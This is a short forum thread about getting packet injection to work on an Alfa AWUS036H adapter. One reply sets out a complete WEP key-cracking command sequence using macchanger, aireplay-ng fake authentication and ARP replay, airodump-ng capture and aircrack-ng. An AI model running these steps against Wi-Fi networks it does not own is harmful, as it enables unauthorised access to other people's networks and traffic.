Results 1 to 4 of 4

Thread: Alfa AWUS036H Injection problem. Reward! $$

  1. #1
    antihaxer
    Guest

    Default Alfa AWUS036H Injection problem.

    Matts helped me out.

  2. #2
    Member
    Join Date
    Mar 2007
    Posts
    121

    Default

    can you explain what you hav tried so far this is the meathod i use for wep keys:

    First i run kismet to monitor whats around thia also enables monitor mode and i hit shift L to lock the vard to that channal
    then these commads:

    macchanger --mac 00:11:22:33:44:55 wlan0

    aireplay-ng -1 0 -e [ap name] -a [ap mac] -h 00:11:22:33:44:55 wlan0

    airodump-ng -w abc -c 001 wlan0 ( -c 001 = channel 1 )

    aireplay-ng -3 -b [ap mac] -h 00:11:22:33:44:55 wlan0

    aircrack-ng abc-01.cap ( thought i prefer to use aircrack-ptw that you have to install yourself )

  3. #3
    antihaxer
    Guest

    Default

    This is not the problem. I go to associate with my access point with this command aireplay-ng -1 0 -e [ap name] -a [ap mac] -h 00:11:22:33:44:55 wlan0 and it goes
    sending auth
    sending auth
    sending auth

    Failed

    Try these things to fix it...

    I go and do everything that it says that might fix it, but it still does not work. I have tried using a livecd with the latest modules and aircrack suit and tryed a vmware live cd and patched drivers manually, but still the same thing happens to me.

  4. #4
    Member
    Join Date
    Mar 2007
    Posts
    121

    Default

    Have you tried it with any other AP's or just the one?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •